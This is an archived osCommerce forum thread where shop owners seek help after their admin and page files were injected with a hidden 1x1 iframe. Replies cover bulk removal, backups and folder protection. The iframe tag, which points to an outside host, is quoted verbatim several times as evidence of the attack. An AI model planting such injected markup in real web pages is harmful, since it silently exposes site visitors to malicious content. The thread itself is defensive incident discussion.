Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

My Site Got an Attack By Hijackers, Help me Please


ShoppingMantra

Recommended Posts

My all the files in admin section was injected with this code

"<iframe src="http://merrychristmasdude.com/ind.php" width="1" height="1" alt="Uw8bLlKjsi3HqXs"></iframe>

 

"

Each and every file has this link in the end.

Please help to remove this code in one time becouse if I delete this one by one then it takes so mu time. I'm trying toi delete this link by going thru each file which is so time taking.

Please help so I can remove it in one time, also tell tht what is the way to get rid from these kind of things, also please tell tht what I might have lost with this code.

Thanks

Link to comment
Share on other sites

I think that the osCommerce Project should copy Zen Cart in this area and have a specialist forum dedicated to notices of Hack Attempts, with the most knowledgeable members of the team providing quick support for hacking issues, with the ability to move the discussion into a private forum for details which cannot or should not be shared publically.

 

Zen Cart also provide a "sticky" at the top of that forum with advice on what to do if your site has been the subject of a hack attack.

 

It won't happen of course, but it was worth mentioning anyway ........ just in case.

 

Vger

Link to comment
Share on other sites

I think that the osCommerce Project should copy Zen Cart in this area and have a specialist forum dedicated to notices of Hack Attempts, with the most knowledgeable members of the team providing quick support for hacking issues, with the ability to move the discussion into a private forum for details which cannot or should not be shared publically.

 

Zen Cart also provide a "sticky" at the top of that forum with advice on what to do if your site has been the subject of a hack attack.

 

It won't happen of course, but it was worth mentioning anyway ........ just in case.

 

Vger

Yes, I totally agree. Hacking is becoming more professional (harder to prevent) and is a very serious issue. Perhaps even a forum that only team members can post to that deals with the ways of preventing/overcoming hack attacks. Hack attacks could be reported similarly to the way that posts are reported for breaching forum rules.

 

I don't know how the legal reponsibilities for the prevention of hacking would pan out in the courts.

Link to comment
Share on other sites

Zen Cart also provide a "sticky" at the top of that forum with advice on what to do if your site has been the subject of a hack attack.

Doesn't appear to be visible to visitors or there are no posts in that particular forum.

Link to comment
Share on other sites

It's actually a link which says "Recovering from hack attempts" which is underneath bold red text saying " Meanwhile secure your site", and is right there on the homepage of their forum under the "Reports of hack attempts" forum:

 

http://www.zen-cart.com/wiki/index.php/Recovering_From_Hacks

 

It doesn't really get more noticeable than that :D

 

We could do a lot worse than to have something similar on these forums, given how important site security is to osCommerce site owners.

 

Vger

Doesn't appear to be visible to visitors or there are no posts in that particular forum.
Link to comment
Share on other sites

  • 2 months later...
It's actually a link which says "Recovering from hack attempts" which is underneath bold red text saying " Meanwhile secure your site", and is right there on the homepage of their forum under the "Reports of hack attempts" forum:

 

http://www.zen-cart.com/wiki/index.php/Recovering_From_Hacks

 

It doesn't really get more noticeable than that :D

 

We could do a lot worse than to have something similar on these forums, given how important site security is to osCommerce site owners.

 

Vger

 

It depends on what html editor you are using, but most (not Notepad) will have a replace function that will search and replace an entire site.

 

So tell it to find "<iframe src="http://merrychristmasdude.com/ind.php" width="1" height="1" alt="Uw8bLlKjsi3HqXs"></iframe>

then replace with either just a space or put replacement code. WARNING back up your site files before working on multiple pages in your site. You will not be able to use the trusty ctrl z to sort out a mistake

Link to comment
Share on other sites

My all the files in admin section was injected with this code

"<iframe src="http://merrychristmasdude.com/ind.php" width="1" height="1" alt="Uw8bLlKjsi3HqXs"></iframe>

 

"

Each and every file has this link in the end.

Please help to remove this code in one time becouse if I delete this one by one then it takes so mu time. I'm trying toi delete this link by going thru each file which is so time taking.

Please help so I can remove it in one time, also tell tht what is the way to get rid from these kind of things, also please tell tht what I might have lost with this code.

Thanks

 

This is really unfortunate this happened to you. But you had a backup of your site on your local drive that you can simply upload to replace the fiddled pages, right?

 

Right?

 

jon

It's all just ones and zeros....

Link to comment
Share on other sites

The important point about this hack was that it was to files inside the admin folder. Perhaps it was left wide open, in which case it wasn't really a hack just someone strolling in there.

 

If it was protected with .htaccess then good servers will automatically lock out IPs which try a set number of times to access a password protected folder using the wrong credentials.

 

If you use a contribution such as Admin Access With Levels, or the new RC1 and RC2 login to the admin panel then that doesn't trigger server firewalls if people use the wrong credentials repeatedly, because it's not .htaccess protection. You still need to rename and password protect the 'admin' folder with .htaccess.

 

Vger

Link to comment
Share on other sites

Geez, I didn't even notice this thread was started back in January. Hope ShoppingMantra is safely back online.

 

Of interest:

"There is a hot new hacking attempt making the rounds lately called
. The hacker injects code into your files which they then use to try to obtain all sorts of information about your shop, server and your visitors computer. They probably can't get too much information on a properly set up server but there are a lot out there that are not set up properly.

 

Besides the above, one of the effects this code has is that it causes google to list your site with a message that says, "This site may harm your computer." Google is using the results of a company named stopbadware.org, which checks websites for this type of code. If they find it, they will then report it to google, who in turns adds the warning about your site. However, neither of them will notify the shop owner about it so your site could be infected and listed with a serious warning and you wouldn't know it until you noticed the listing on google.

 

To check if your site is infected, search your files for

- iframe (not used in most osCommerce shops)

- a line of code that starts with <script language="JavaScript">e

- a string of letters like AAAAAAAA

 

Any of the above could be in an osCommerce shop legitimately, although it is probably unlikely. If it is, then you need to look closer at the code to see if it belongs there.
Keeping a known, good backup of your files on your computer to compare against is always a good idea."

It's all just ones and zeros....

Link to comment
Share on other sites

i just got hit...

 

its gone in and changed my index.php & login.php in my root, admin & language folders....

 

pointing to a 1x1 pixel iframe which creates multiple popups on your homepage/admin page

 

in process of fixing of course and any hints on prevetning will be appreciated...

cheers

The sooner you fall behind, the more time you'll have to catch up.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...